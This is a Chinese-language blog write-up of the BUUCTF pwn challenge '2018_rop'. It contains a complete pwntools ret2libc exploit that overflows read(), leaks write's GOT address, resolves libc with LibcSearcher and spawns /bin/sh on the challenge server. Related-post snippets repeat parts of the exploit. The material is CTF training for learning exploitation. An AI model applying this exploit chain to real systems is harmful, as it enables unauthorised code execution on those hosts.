铁人三项(第五赛区)_2018_rop

最新推荐文章于 2024-04-22 12:50:24 发布
最新推荐文章于 2024-04-22 12:50:24 发布
阅读量3k 收藏
点赞数
文章标签: 安全 linux pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52231248/article/details/121337105
版权

铁人三项(第五赛区)_2018_rop

Ubuntu18

Checksec:

Ida:

可以很容易找到read函数存在溢出offset=0x88+4

程序没有system函数和sh字段,ret2libc来绕过nx

Exp:

from pwn import *    
from LibcSearcher import*
r=remote("node4.buuoj.cn",29553)  
elf=ELF("./2018_rop")
vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']
payload = flat('a'*(0x88+0x4)) + p32(write_plt)  + p32(vul_addr) + p32(1) + p32(write_got) + p32(4)                 
r.sendline(payload)
write_addr=u32(r.recv())
libc = LibcSearcher('write', write_addr)
libc_base=write_addr-libc.dump('write') 
sys_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump("str_bin_sh")
payload1 = flat("a" * 0x88) + flat("b"*4)+ p32(sys_addr)+p32(1)+p32(bin_addr)
r.sendline(payload1)
r.interactive()

Flag:

_white_233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
基于ROP的SAMPLE开发代码,属于通信框架的一部分。ROP是淘宝提供的一种开发协议框架,底层基于NETTY。
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 7万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 647
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
【BUUCTFPWN铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 299
【BUUCTFPWN铁人三项(第五赛区)_2018_rop题解
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 333
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 215
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
rop_matlab1.rar_数据结构_matlab_
08-11
利用宽度有限方法(BFS)寻找最短路径和最小树的算法和算例。
中文UML建模工具Trufun Plato 2005.rar
06-03
中文UML建模工具Trufun Plato 2005.rar
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 207
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 392
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)
空城惜梦的博客
06-04 894
@[TOC]( [PWN] BUUCTF 铁人三项(第五赛区)_2018_rop)
20232831袁思承2023-2024-2 《网络攻防实践》第6次作业
qq_53198713的博客
04-19 752
网络攻防~
Trivy离线扫描:容器安全实践指南
飞翔沫沫情博客
04-19 885
使用 fanal 漏洞库,快速查询操作系统版本信息trivy 会提取目标镜像的 ImageID,并根据目标镜像记录的生成关系,计算出其基础镜像的 ImageID。然后,在 fanal.db中保存的 ImageID 进行查询。如果命中,就可以快速确基础镜像对应的操作系统、版本信息等信息。解析基础镜像的系统文件,获得操作系统版本信息。
亚马逊账号安全:如何避免被关联和封禁?
Tiger_Bella的博客
04-16 1061
无论是在亚马逊、eBay、Wish、速卖通、沃尔玛、美客多、独立站、阿里国际、Lazada、Shopee还是Mercari等平台,通过自养号测评来获取评论和销量,是最节约成本、也是最有效的方式之一。实际上,最重要的是要了解平台风控的关键点,是硬件参数的关联、IP的纯净度问题,还是指纹插件或者cookie的关联,又或者是支付卡被风控。亚马逊内部设有卖家举报功能。2. IP地址的纯净度问题:采用高质量的IP地址服务,避免使用被大量其他用户共享的IP,可以考虑使用一些专业的IP服务提供商,确保IP的干净程度。
富格林:戒备虚假套路保障安全
最新发布
fgl100的博客
04-22 174
在投资黄金之前,制定一个明确的投资计划是非常重要的。因此,我们应该将黄金投资作为投资组合的一部分,并与其他资产进行适当的分散,以降低整体投资风险。黄金市场的波动性较大,价格可能会出现剧烈波动。因此,我们需要保持冷静,不要被市场情绪所左右,避免盲目跟风操作,以免造成损失。黄金作为一种避险资产,通常在长期内具有保值和增值的特性,因此长期持有黄金投资可能会带来更好的回报。在开始投资黄金之前,了解黄金市场的基本知识是至关重要的。富格林悉知,现货黄金是一种传统而又具有吸引力的投资方式,因为它通常被视为一种避险资产。
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值